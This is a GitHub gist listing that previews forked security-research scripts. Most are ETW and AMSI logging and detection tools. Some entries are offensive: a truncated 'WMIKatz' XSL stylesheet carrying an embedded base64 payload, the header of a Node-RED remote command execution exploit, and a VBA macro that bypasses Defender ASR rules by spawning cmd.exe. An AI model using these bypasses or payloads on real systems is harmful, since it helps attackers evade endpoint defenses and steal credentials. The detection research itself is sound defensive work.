lctrcl lctrcl
lctrcl
/ process_image_logging.ps1
Created
February 1, 2019 12:50
— forked from mattifestation/process_image_logging.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # These values were obtained from: logman query providers Microsoft-Windows-Kernel-Process | |
| $WINEVENT_KEYWORD_PROCESS = 0x10 | |
| $WINEVENT_KEYWORD_IMAGE = 0x40 | |
| # Normally when you enable an analytic log, all keywords are logged which can be veeeeerrrrryy noisy. | |
| # I'm going to limit collection to only image and process event | |
| $KernelProcessLog = New-Object -TypeName System.Diagnostics.Eventing.Reader.EventLogConfiguration -ArgumentList 'Microsoft-Windows-Kernel-Process/Analytic' | |
| $KernelProcessLog.ProviderKeywords = ($WINEVENT_KEYWORD_PROCESS -bor $WINEVENT_KEYWORD_IMAGE) | |
| $KernelProcessLog.ProviderLevel = 0xFF | |
| $KernelProcessLog.IsEnabled = $true |
lctrcl
/ EnableAMSILogging.ps1
Created
February 7, 2019 12:24
— forked from mattifestation/EnableAMSILogging.ps1
Enables AMSI logging to the AMSI/Operational event log
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Run this elevated, reboot, boom. | |
| # Feel free to name this whatever you want | |
| $AutoLoggerName = 'MyAMSILogger' | |
| $AutoLoggerGuid = "{$((New-Guid).Guid)}" | |
| New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled | |
| Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41 |
lctrcl
/ CollectDotNetEvents.ps1
Created
February 7, 2019 12:24
— forked from mattifestation/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets | |
| # Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass | |
| # logman stop dotNetTrace -ets | |
| # This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe | |
| # I got the process ID by running a procmon trace | |
| $TargetProcessId = 8256 |
lctrcl
/ dotnet-runtime-etw.py
Created
February 7, 2019 13:28
— forked from countercept/dotnet-runtime-etw.py
A research aid for tracing security relevant events in the CLR via ETW for detecting malicious assemblies.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import etw | |
| import etw.evntrace | |
| import sys | |
| import argparse | |
| import threading | |
| class RundownDotNetETW(etw.ETW): | |
| def __init__(self, verbose, high_risk_only): |
lctrcl
/ AMSIScriptContentRetrieval.ps1
Created
February 7, 2019 13:58
— forked from mattifestation/AMSIScriptContentRetrieval.ps1
PoC code used to demonstrate extracting script contents using the AMSI ETW provider
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Script author: Matt Graeber (@mattifestation) | |
| # logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets | |
| # Do your malicious things here that would be logged by AMSI | |
| # logman stop AMSITrace -ets | |
| $OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture | |
| $OSArch = $OSArchProperty.OSArchitecture | |
| $OSPointerSize = 32 | |
| if ($OSArch -eq '64-bit') { $OSPointerSize = 64 } |
lctrcl
/ gist:692dd338acc00a8a8f6b8af59e7d387f
Created
February 11, 2019 22:15
WMIKatz - Are you afraid
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0"> | |
| <!-- Copyright (c) Microsoft Corporation. All rights reserved. --> | |
| <xsl:output method="text" omit-xml-declaration="yes" indent="no"/> | |
| <xsl:strip-space elements="*" /> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| data:application/x-zip-compressed;base64,UEsDBBQAAAAIANKTaUzM9B2HXvQPABwIUAAMAAAAbWltaWthdHoueHNs7F1Jj+U+ET/TUn+HZk6AeiCLEzsIkBCcEJzggMQBsTQwaIb5a2ZYPz21/2wnee/1MHCh1d3peCuXy7W57CTf+8fHt9/9+Omfb58+/unp6dPDP969/cvH71Lm91/96dOnr777ne/8/e9///bf52+///DH74zbtn3nlz//6Xd+8eE3f/n4h/cf3r2yBu8+fv/VXz/85bsff/enp3e/+fj63ZvffXj/8f0fPr3+3ft3DO6T1/zbb7Xmpz89vaac1394Q11Ljdd/+61X+uvHpw/ff/XV29/87ulP79/+/unDq4e/PX34+Ob9X77/avz28OoH93ff+/rr1w8/ev/VPz+8+eOfPj1843fffPiZd0r5H756/+E3n6jBtx8efvj27YPU+vjw4Ykg/+3p999+eP2agBAYHv/7v3766q+fHt49ffrT+99//9Wnp38Quu/fvfkkGP7+6Xdvf0PApPd/Pn189fDmL79/+sun77/6y/tX3yEoRsMPb756/fErQvnh6e3TO6pANPnWq4fvaD/vPhJxqMqnhzfvvrLy1199ePrDm38QQT7yEN/+5i9//Otv/vj0/Vc/+blU1XH+6kc//uEvfvgrhvK1+7u//ebDA9V+85u3b/719Ptfv//tnx++/0CFw+P4OMjPtCz1n+XjJ0XOnB7L/DhO4+M4LvS3Po7DSH/bY1of12Kp8nh/p3fz45a9GrXU8jHR/4VKuCrfEsAJFRku1xoe88S3VmuIxrMhU672KHeUYX1K/5KVCpUR2p5B/5P1NXDhzD90cz5a6rDq/b842jQ/th1Rz11X68YAOMktGOGbJ+pZiN/fPRP1fAGJMllqCkS2rYfMFXOmjr3hVgJ6nrmGAhi/HL23x0m4iwVkC14jlEMYJr8rn03j+7svhe6ePS4yh8whCYYPgfNtCJPOvrZd5K+ |
lctrcl
/ noderedsh.py
Created
February 13, 2019 21:41
— forked from qkaiser/noderedsh.py
Node RED Remote Command Execution.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| ---------------------------------------------------------------------------- | |
| "THE BEER-WARE LICENSE" (Revision 42): | |
| QKaiser wrote this file. As long as you retain this notice you | |
| can do whatever you want with this stuff. If we meet some day, and you think | |
| this stuff is worth it, you can buy me a beer in return. | |
| ---------------------------------------------------------------------------- | |
| ---------------------------------------------------------------------------- | |
| Node-RED Remote Command Execution exploit. |
lctrcl
/ PSProcmon.psm1
Created
February 25, 2019 08:43
— forked from mattifestation/PSProcmon.psm1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry | |
| [Flags()] | |
| enum RegistryOptions { | |
| CloseKey = 0x00000001 | |
| QuerySecurityKey = 0x00000002 | |
| SetSecurityKey = 0x00000004 | |
| EnumerateValueKey = 0x00000010 | |
| QueryMultipleValueKey = 0x00000020 | |
| SetInformationKey = 0x00000040 | |
| FlushKey = 0x00000080 |
lctrcl
/ ASR Rules Bypass.vba
Created
February 25, 2019 15:04
ASR rules bypass creating child processes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |